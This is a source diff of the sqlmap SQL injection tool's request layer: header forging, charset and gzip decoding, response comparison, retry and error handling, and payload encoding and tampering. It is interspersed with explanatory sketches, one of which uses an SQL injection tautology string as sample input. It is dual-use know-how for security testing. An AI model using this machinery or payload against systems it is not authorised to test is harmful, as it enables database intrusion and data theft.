+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import codecs

@@ -18,11 +18,13 @@ from lib.core.common import extractErrorMessage
 from lib.core.common import extractRegexResult
 from lib.core.common import getPublicTypeMembers
 from lib.core.common import getUnicode
+from lib.core.common import isListLike
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
 from lib.core.common import singleTimeLogMessage
 from lib.core.common import singleTimeWarnMessage
+from lib.core.common import unArrayizeValue
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger

@@ -46,7 +48,7 @@ from lib.utils.htmlentities import htmlEntities
 from thirdparty.chardet import detect
 from thirdparty.odict.odict import OrderedDict

-def forgeHeaders(items=None):
+def forgeHeaders(items=None, base=None):
     """
     Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing
     the HTTP requests

@@ -58,7 +60,7 @@ def forgeHeaders(items=None):
         if items[_] is None:
             del items[_]

-    headers = OrderedDict(conf.httpHeaders)
+    headers = OrderedDict(conf.httpHeaders if base is None else base)
     headers.update(items.items())

     class _str(str):
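
The forgeHeaders() hunks above add an optional base argument so a caller can merge per-request items over an arbitrary starting set of headers instead of always starting from the global configuration. The sketch below mirrors just that merging idea with plain dictionaries (the constant and function names are made up for the example):

    from collections import OrderedDict

    GLOBAL_HEADERS = [("User-Agent", "sqlmap-demo"), ("Accept", "*/*")]

    def forge_headers(items=None, base=None):
        # Drop explicit None values so they cannot clobber existing headers
        items = {k: v for k, v in dict(items or {}).items() if v is not None}
        # Start from the global defaults unless an explicit base is supplied
        headers = OrderedDict(GLOBAL_HEADERS if base is None else base)
        headers.update(items)
        return headers

    print(forge_headers({"Cookie": "id=1", "Referer": None}))  # global defaults plus Cookie
    print(forge_headers({"Cookie": "id=1"}, base={}))          # Cookie only, no defaults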
@@ -92,7 +94,7 @@ def forgeHeaders(items=None):
     if conf.cj:
         if HTTP_HEADER.COOKIE in headers:
             for cookie in conf.cj:
-                if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
+                if cookie.domain_specified and not (conf.hostname or "").endswith(cookie.domain):
                     continue

                 if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):

@@ -107,7 +109,9 @@ def forgeHeaders(items=None):
                     kb.mergeCookies = readInput(message, default='Y', boolean=True)

                 if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
-                    _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
+                    def _(value):
+                        return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)
+
                     headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])

                 if PLACE.COOKIE in conf.parameters:

@@ -149,13 +153,16 @@ def checkCharEncoding(encoding, warn=True):
     'utf8'
     """

+    if isListLike(encoding):
+        encoding = unArrayizeValue(encoding)
+
     if encoding:
         encoding = encoding.lower()
     else:
         return encoding

     # Reference: http://www.destructor.de/charsets/index.htm
     translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}

     for delimiter in (';', ',', '('):
         if delimiter in encoding:

@@ -212,10 +219,6 @@ def checkCharEncoding(encoding, warn=True):
     try:
         codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
     except (LookupError, ValueError):
-        if warn:
-            warnMsg = "unknown web page charset '%s'. " % encoding
-            warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
-            singleTimeLogMessage(warnMsg, logging.WARN, encoding)
         encoding = None

     if encoding:
@@ -253,12 +256,22 @@ def decodePage(page, contentEncoding, contentType):
     if not page or (conf.nullConnection and len(page) < 2):
         return getUnicode(page)

-    if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"):
+    if isinstance(contentEncoding, basestring) and contentEncoding:
+        contentEncoding = contentEncoding.lower()
+    else:
+        contentEncoding = ""
+
+    if isinstance(contentType, basestring) and contentType:
+        contentType = contentType.lower()
+    else:
+        contentType = ""
+
+    if contentEncoding in ("gzip", "x-gzip", "deflate"):
         if not kb.pageCompress:
             return None

         try:
-            if contentEncoding.lower() == "deflate":
+            if contentEncoding == "deflate":
                 data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
             else:
                 data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page))

@@ -279,27 +292,26 @@ def decodePage(page, contentEncoding, contentType):
             kb.pageCompress = False
             raise SqlmapCompressionException

-    if not conf.charset:
+    if not conf.encoding:
         httpCharset, metaCharset = None, None

         # Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode
-        if contentType and (contentType.find("charset=") != -1):
+        if contentType.find("charset=") != -1:
             httpCharset = checkCharEncoding(contentType.split("charset=")[-1])

         metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))

-        if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
-            or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
+        if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset))) or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
             kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
             debugMsg = "declared web page charset '%s'" % kb.pageEncoding
             singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
         else:
             kb.pageEncoding = None
     else:
-        kb.pageEncoding = conf.charset
+        kb.pageEncoding = conf.encoding

     # can't do for all responses because we need to support binary files too
-    if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
+    if not isinstance(page, unicode) and "text/" in contentType:
         if kb.heuristicMode:
             kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
             page = getUnicode(page, kb.pageEncoding)

@@ -317,7 +329,7 @@ def decodePage(page, contentEncoding, contentType):

         kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))

-        if kb.pageEncoding and kb.pageEncoding.lower() == "utf-8-sig":
+        if (kb.pageEncoding or "").lower() == "utf-8-sig":
             kb.pageEncoding = "utf-8"
             if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
                 page = page[3:]

@@ -373,7 +385,7 @@ def processResponse(page, responseHeaders, status=None):
                 continue

             conf.paramDict[PLACE.POST][name] = value
-            conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
+            conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST])

     if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
         kb.browserVerification = True
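
The decodePage() hunks above normalize the Content-Encoding and Content-Type values once, up front (lowercased, empty string when missing), so the later checks such as membership in ("gzip", "x-gzip", "deflate") and the "text/" test no longer need their own None guards. A compact, self-contained approximation of that flow in Python 3 (the helper below is illustrative, not the sqlmap function):

    import gzip
    import io
    import zlib

    def decode_body(body, content_encoding, content_type):
        # Normalize possibly-missing header values exactly once
        content_encoding = content_encoding.lower() if isinstance(content_encoding, str) else ""
        content_type = content_type.lower() if isinstance(content_type, str) else ""

        if content_encoding in ("gzip", "x-gzip", "deflate"):
            if content_encoding == "deflate":
                body = zlib.decompress(body, -15)  # raw deflate stream
            else:
                body = gzip.GzipFile(fileobj=io.BytesIO(body)).read()

        # Only text responses are decoded to a string; binary bodies pass through
        if "text/" in content_type:
            return body.decode("utf-8", "replace")
        return body

    compressed = gzip.compress(b"<html>hello</html>")
    print(decode_body(compressed, "gzip", "text/html; charset=utf-8"))
    print(decode_body(b"\x89PNG", None, None))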
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import urllib2

@@ -30,10 +30,8 @@ class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
             self.retried_count = 0
         else:
             if self.retried_count > 5:
-                raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed",
-                    headers, None)
+                raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None)
             else:
                 self.retried_count += 1

-        return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
-            self, auth_header, host, req, headers)
+        return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers)

@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import re

@@ -49,7 +49,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
     threadData = getCurrentThreadData()

     if kb.testMode:
-        threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else ""
+        threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else ""
         threadData.lastComparisonPage = page
         threadData.lastComparisonCode = code

@@ -57,7 +57,7 @@
         return None

     if any((conf.string, conf.notString, conf.regexp)):
-        rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page)
+        rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page)

         # String to match in page when the query is True and/or valid
         if conf.string:
@@ -106,16 +106,21 @@
     # Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
     # (e.g. if one page is PDF and the other is HTML)
     if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
-        page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
+        page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
     elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
-        seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
+        seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")

-    if seqMatcher.a and page and seqMatcher.a == page:
-        ratio = 1
+    if any(_ is None for _ in (page, seqMatcher.a)):
+        return None
+    elif seqMatcher.a and page and seqMatcher.a == page:
+        ratio = 1.
     elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
-        ratio = 1.0 * len(seqMatcher.a) / len(page)
-        if ratio > 1:
-            ratio = 1. / ratio
+        if not page or not seqMatcher.a:
+            return float(seqMatcher.a == page)
+        else:
+            ratio = 1. * len(seqMatcher.a) / len(page)
+            if ratio > 1:
+                ratio = 1. / ratio
     else:
         seq1, seq2 = None, None
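
The comparison hunk above adds an early exit when either page is None and keeps a cheap fallback for oversized responses: instead of a full difflib ratio, it uses the length ratio of the two pages, inverted when above 1 so the result stays within 0..1. A tiny standalone sketch of that fallback (not the sqlmap function itself):

    def quick_ratio(a, b):
        # Cheap stand-in for difflib.SequenceMatcher.ratio() on very large inputs
        if a is None or b is None:
            return None
        if not a or not b:
            return float(a == b)
        ratio = 1.0 * len(a) / len(b)
        return 1.0 / ratio if ratio > 1 else ratio

    print(quick_ratio("x" * 1000, "x" * 800))  # 0.8
    print(quick_ratio("", ""))                 # 1.0
    print(quick_ratio("abc", None))            # None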
@@ -1,14 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import binascii
 import compiler
 import httplib
-import json
 import keyword
 import logging
 import re

@@ -34,6 +33,7 @@ from lib.core.common import calculateDeltaSeconds
 from lib.core.common import checkSameHost
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
+from lib.core.common import escapeJsonValue
 from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
 from lib.core.common import findMultipartPostBoundary

@@ -51,16 +51,19 @@ from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import removeReflectiveValues
+from lib.core.common import safeVariableNaming
 from lib.core.common import singleTimeLogMessage
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import stdev
 from lib.core.common import wasLastResponseDelayed
 from lib.core.common import unicodeencode
+from lib.core.common import unsafeVariableNaming
 from lib.core.common import urldecode
 from lib.core.common import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.decorators import stackedmethod
 from lib.core.dicts import POST_HINT_CONTENT_TYPES
 from lib.core.enums import ADJUST_TIME_DELAY
 from lib.core.enums import AUTH_TYPE

@@ -116,7 +119,6 @@ from lib.request.methodrequest import MethodRequest
 from thirdparty.odict.odict import OrderedDict
 from thirdparty.socks.socks import ProxyError
-

 class Connect(object):
     """
     This class defines methods used to perform HTTP requests
@@ -185,13 +187,13 @@ class Connect(object):
|
|||||||
|
|
||||||
if not kb.dnsMode and conn:
|
if not kb.dnsMode and conn:
|
||||||
headers = conn.info()
|
headers = conn.info()
|
||||||
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||||
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
|
||||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||||
warnMsg = "large compressed response detected. Disabling compression"
|
warnMsg = "large compressed response detected. Disabling compression"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
kb.pageCompress = False
|
kb.pageCompress = False
|
||||||
|
raise SqlmapCompressionException
|
||||||
else:
|
else:
|
||||||
while True:
|
while True:
|
||||||
if not conn:
|
if not conn:
|
||||||
@@ -239,27 +241,27 @@ class Connect(object):
 kb.requestCounter += 1
 threadData.lastRequestUID = kb.requestCounter

 url = kwargs.get("url", None) or conf.url
 get = kwargs.get("get", None)
 post = kwargs.get("post", None)
 method = kwargs.get("method", None)
 cookie = kwargs.get("cookie", None)
 ua = kwargs.get("ua", None) or conf.agent
 referer = kwargs.get("referer", None) or conf.referer
 host = kwargs.get("host", None) or conf.host
 direct_ = kwargs.get("direct", False)
 multipart = kwargs.get("multipart", None)
 silent = kwargs.get("silent", False)
 raise404 = kwargs.get("raise404", True)
 timeout = kwargs.get("timeout", None) or conf.timeout
 auxHeaders = kwargs.get("auxHeaders", None)
 response = kwargs.get("response", False)
 ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
 refreshing = kwargs.get("refreshing", False)
 retrying = kwargs.get("retrying", False)
 crawling = kwargs.get("crawling", False)
 checking = kwargs.get("checking", False)
 skipRead = kwargs.get("skipRead", False)

 if multipart:
 post = multipart
@@ -317,8 +319,8 @@ class Connect(object):

 elif target:
 if conf.forceSSL and urlparse.urlparse(url).scheme != "https":
-url = re.sub("(?i)\Ahttp:", "https:", url)
-url = re.sub("(?i):80/", ":443/", url)
+url = re.sub(r"(?i)\Ahttp:", "https:", url)
+url = re.sub(r"(?i):80/", ":443/", url)

 if PLACE.GET in conf.parameters and not get:
 get = conf.parameters[PLACE.GET]
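Many of the remaining hunks only convert regex literals from plain strings to raw strings (r"..."). A short, generic illustration of why: escape sequences such as \A or \d inside plain string literals are deprecated on newer Python interpreters, while the raw-string form spells the same pattern unambiguously. The URL below is a placeholder:

```python
import re

url = "HTTP://www.example.com:80/index.php"

# "(?i)\Ahttp:" and r"(?i)\Ahttp:" compile to the same pattern today, but the
# plain-string form relies on "\A" not being a recognised string escape and
# triggers DeprecationWarning on newer interpreters. Raw strings avoid that.
url = re.sub(r"(?i)\Ahttp:", "https:", url)
url = re.sub(r"(?i):80/", ":443/", url)
print(url)  # https://www.example.com:443/index.php
```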
@@ -344,7 +346,7 @@ class Connect(object):
 requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

 # Prepare HTTP headers
-headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
+headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})

 if HTTP_HEADER.COOKIE in headers:
 cookie = headers[HTTP_HEADER.COOKIE]
@@ -384,11 +386,7 @@ class Connect(object):
 headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})

 if auxHeaders:
-for key, value in auxHeaders.items():
-for _ in headers.keys():
-if _.upper() == key.upper():
-del headers[_]
-headers[key] = value
+headers = forgeHeaders(auxHeaders, headers)

 for key, value in headers.items():
 del headers[key]
@@ -409,8 +407,10 @@ class Connect(object):
 ws.close()
 code = ws.status
 status = httplib.responses[code]

 class _(dict):
 pass

 responseHeaders = _(ws.getheaders())
 responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]

@@ -430,8 +430,10 @@ class Connect(object):
 method = unicodeencode(method)
 req = MethodRequest(url, post, headers)
 req.set_method(method)
-else:
+elif url is not None:
 req = urllib2.Request(url, post, headers)
+else:
+return None, None, None

 requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])

@@ -481,8 +483,7 @@ class Connect(object):

 # Get HTTP response
 if hasattr(conn, "redurl"):
-page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
-else Connect._connReadProxy(conn)) if not skipRead else None
+page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None
 skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
 code = conn.redcode
 else:
@@ -497,7 +498,7 @@ class Connect(object):
 responseHeaders = {}

 page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
-status = getUnicode(conn.msg) if conn else None
+status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None

 kb.connErrorCounter = 0

@@ -546,6 +547,15 @@ class Connect(object):
 warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
 logger.warn(warnMsg)

+except SqlmapConnectionException, ex:
+if conf.proxyList and not kb.threadException:
+warnMsg = "unable to connect to the target URL ('%s')" % ex
+logger.critical(warnMsg)
+threadData.retriesCount = conf.retries
+return Connect._retryProxy(**kwargs)
+else:
+raise
+
 except urllib2.HTTPError, ex:
 page = None
 responseHeaders = None
@@ -571,7 +581,7 @@ class Connect(object):
 page = page if isinstance(page, unicode) else getUnicode(page)

 code = ex.code
-status = getUnicode(ex.msg)
+status = getSafeExString(ex)

 kb.originalCode = kb.originalCode or code
 threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
@@ -594,34 +604,35 @@ class Connect(object):
 if not multipart:
 logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)

-if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
-errMsg = "not authorized, try to provide right HTTP "
-errMsg += "authentication type and valid credentials (%d)" % code
-raise SqlmapConnectionException(errMsg)
-elif ex.code == httplib.NOT_FOUND:
-if raise404:
-errMsg = "page not found (%d)" % code
-raise SqlmapConnectionException(errMsg)
-else:
-debugMsg = "page not found (%d)" % code
-singleTimeLogMessage(debugMsg, logging.DEBUG)
-elif ex.code == httplib.GATEWAY_TIMEOUT:
-if ignoreTimeout:
-return None if not conf.ignoreTimeouts else "", None, None
-else:
-warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
-if threadData.retriesCount < conf.retries and not kb.threadException:
-warnMsg += ". sqlmap is going to retry the request"
-logger.critical(warnMsg)
-return Connect._retryProxy(**kwargs)
-elif kb.testMode:
-logger.critical(warnMsg)
-return None, None, None
+if ex.code != conf.ignoreCode:
+if ex.code == httplib.UNAUTHORIZED:
+errMsg = "not authorized, try to provide right HTTP "
+errMsg += "authentication type and valid credentials (%d)" % code
+raise SqlmapConnectionException(errMsg)
+elif ex.code == httplib.NOT_FOUND:
+if raise404:
+errMsg = "page not found (%d)" % code
+raise SqlmapConnectionException(errMsg)
 else:
-raise SqlmapConnectionException(warnMsg)
-else:
-debugMsg = "got HTTP error code: %d (%s)" % (code, status)
-logger.debug(debugMsg)
+debugMsg = "page not found (%d)" % code
+singleTimeLogMessage(debugMsg, logging.DEBUG)
+elif ex.code == httplib.GATEWAY_TIMEOUT:
+if ignoreTimeout:
+return None if not conf.ignoreTimeouts else "", None, None
+else:
+warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
+if threadData.retriesCount < conf.retries and not kb.threadException:
+warnMsg += ". sqlmap is going to retry the request"
+logger.critical(warnMsg)
+return Connect._retryProxy(**kwargs)
+elif kb.testMode:
+logger.critical(warnMsg)
+return None, None, None
+else:
+raise SqlmapConnectionException(warnMsg)
+else:
+debugMsg = "got HTTP error code: %d (%s)" % (code, status)
+logger.debug(debugMsg)

 except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
 tbMsg = traceback.format_exc()
@@ -634,13 +645,6 @@ class Connect(object):
 elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
 warnMsg = "connection was forcibly closed by the target URL"
 elif "timed out" in tbMsg:
-if not conf.disablePrecon:
-singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
-conf.disablePrecon = True
-
-if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
-kb.responseTimes.clear()
-
 if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
 singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
 kb.droppingRequests = True
@@ -673,9 +677,12 @@ class Connect(object):
 warnMsg = "there was an incomplete read error while retrieving data "
 warnMsg += "from the target URL"
 elif "Handshake status" in tbMsg:
-status = re.search("Handshake status ([\d]{3})", tbMsg)
+status = re.search(r"Handshake status ([\d]{3})", tbMsg)
 errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
 raise SqlmapConnectionException(errMsg)
+elif "SqlmapCompressionException" in tbMsg:
+warnMsg = "problems with response (de)compression"
+retrying = True
 else:
 warnMsg = "unable to connect to the target URL"

@@ -711,7 +718,7 @@ class Connect(object):
 else:
 logger.debug(warnMsg)
 return Connect._retryProxy(**kwargs)
-elif kb.testMode:
+elif kb.testMode or kb.multiThreadMode:
 logger.critical(warnMsg)
 return None, None, None
 else:
@@ -730,12 +737,12 @@ class Connect(object):
 if conn and getattr(conn, "redurl", None):
 _ = urlparse.urlsplit(conn.redurl)
 _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
-requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)
+requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)

 if kb.resendPostOnRedirect is False:
-requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
-requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
-requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
+requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg)
+requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg)
+requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg)

 responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
 else:
@@ -758,11 +765,12 @@ class Connect(object):
 return page, responseHeaders, code

 @staticmethod
-def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
+@stackedmethod
+def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False):
 """
 This method calls a function to get the target URL page content
-and returns its page MD5 hash or a boolean value in case of
-string match check ('--string' command line parameter)
+and returns its page ratio (0 <= ratio <= 1) or a boolean value
+representing False/True match in case of !getRatioValue
 """

 if conf.direct:
@@ -788,6 +796,8 @@ class Connect(object):
 raise404 = place != PLACE.URI if raise404 is None else raise404
 method = method or conf.method

+postUrlEncode = kb.postUrlEncode
+
 value = agent.adjustLateValues(value)
 payload = agent.extractPayload(value)
 threadData = getCurrentThreadData()
@@ -796,14 +806,14 @@ class Connect(object):
 headers = OrderedDict(conf.httpHeaders)
 contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

-if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
-kb.postUrlEncode = False
+if (kb.postHint or conf.skipUrlEncode) and postUrlEncode:
+postUrlEncode = False
 conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
 contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
 conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))

 if payload:
-if kb.tamperFunctions:
+if not disableTampering and kb.tamperFunctions:
 for function in kb.tamperFunctions:
 try:
 payload = function(payload=payload, headers=auxHeaders)
@@ -827,21 +837,15 @@ class Connect(object):
 # with their HTML encoded counterparts
 payload = payload.replace('>', "&gt;").replace('<', "&lt;")
 elif kb.postHint == POST_HINT.JSON:
-if payload.startswith('"') and payload.endswith('"'):
-payload = json.dumps(payload[1:-1])
-else:
-payload = json.dumps(payload)[1:-1]
+payload = escapeJsonValue(payload)
 elif kb.postHint == POST_HINT.JSON_LIKE:
 payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
-if payload.startswith('"') and payload.endswith('"'):
-payload = json.dumps(payload[1:-1])
-else:
-payload = json.dumps(payload)[1:-1]
+payload = escapeJsonValue(payload)
 payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
 value = agent.replacePayload(value, payload)
 else:
 # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
-if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
+if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:
 skip = False

 if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
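The JSON hunk above replaces the manual json.dumps() slicing with an escapeJsonValue() helper whose implementation is not shown in this diff. A short worked example of what the old idiom did - escaping a payload so it can be spliced into an existing JSON string value; the payload itself is illustrative:

```python
import json

payload = 'abc" OR "1"="1'

# json.dumps() yields a quoted JSON string literal; dropping the outer quotes
# with [1:-1] leaves just the escaped body, safe to embed inside "key": "..."
escaped = json.dumps(payload)[1:-1]
print(escaped)  # abc\" OR \"1\"=\"1
```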
@@ -852,8 +856,11 @@ class Connect(object):
 skip = True

 if not skip:
-payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
